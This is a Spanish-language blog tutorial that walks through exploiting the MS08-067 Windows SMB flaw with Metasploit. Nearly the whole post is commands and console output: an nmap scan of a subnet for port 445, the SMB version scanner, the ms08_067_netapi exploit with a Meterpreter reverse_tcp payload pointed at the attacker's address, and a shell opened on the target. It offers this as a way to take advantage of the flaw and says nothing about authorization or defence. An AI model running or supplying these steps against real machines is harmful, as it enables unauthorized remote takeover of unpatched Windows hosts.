Metasploit MS08-067

2.11.09

Microsoft Security Bulletin MS08-067

Esta guía se me ocurrió cuando hablaba sobre MSF con figuex y decidí hacerla, este error es muy común en los computadores con windows, apesar que la vulnerabilidad es de octubre del 2008 sigue siendo muy común. Veamos como sacar provecho de la vulnerabilidad:

Podemos ver informacion con respecto a la vulnerabilidad en:
1. http://www.securityfocus.com/bid/31874/info
2. http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

Necesitamos el puerto 445/tcp abierto.
#nmap -v -sV 192.168.0.0/24 (buscamos en toda la red)
#nmap -v -sV 192.168.0.100 (objetivo especifico)

root@jhyx:~# nmap -v -sV 192.168.0.111
...snip...

Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
79/tcp  open  finger?
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
...snip...


Nos ubicamos dentro de metasploit y lo ejecutamos.
#cd msf/
#./msfconsole

Nos familiarizamos un poco con la interfaz,
msf > help
msf > show auxiliary
msf > show payloads 
msf > show exploits
 
Verificamos la version de Windows, para saber si es vulnerable.
msf > search scanner
msf > use scanner/smb/version
msf > show OPTIONS (vemos las opciones disponibles)
msf > set RHOSTS 192.168.0.100 (configuramos el hosts remoto)
msf > run

msf > run
[*] 192.168.0.111 is running Windows XP Service Pack 2 (language: Spanish)
[*] Auxiliary module execution completed


Buscamos el exploit que vamos a usar.
msf > search ms08_67

Lo seleccionamos.
msf > use windows/smb/ms08_067_netapi

Y buscamos un payload (sirve para enviar el exploit).
msf > show payloads

Si sabemos cual usar, podemos buscar uno especifico:
msf > search meterpreter

Para usar el payload con nuestro exploit previamente seleccionado.
msf > set payload windows/meterpreter/reverse_tcp

Vemos las opciones y configuramos lo necesario.
msf > show OPTIONS
msf > set RHOST 192.168.0.100
msf > ser LHOST 192.168.0.145 (Aqui va la ip de nosotros)

Por ultimo lanzamos el exploit.
msf > exploit

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.0.145:4444 -> 192.168.0.100:3807)


Luego de haber ejecutado el payload meterpreter. Revisamos sus opciones:
meterpreter > help

Soliciamos acceso al shell del computador objetivo.
meterpreter > execute (Vemos las opciones)

meterpreter > execute -f cmd.exe -c

meterpreter > execute -f cmd.exe -c
Process 1960 created.
Channel 1 created.


Accedemos al canal creado.
meterpreter > interact (channel)
meterpreter > interact 1

Los comandos execute y interact permite al atacante acceder el computador objetivo a traves del command prompt.

Luego de esto estaremos en el shell del objetivo.

Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


Ahora solo necesitas tener conocimientos y saber movernos a traves ms-dos.... Ya ese es otro tema.

Para salirnos de la ventana de ms-dos, "Ctrl+c".


Jhyx

0 comentarios:

Creative Commons License
Esta obra está bajo una licencia de Creative Commons.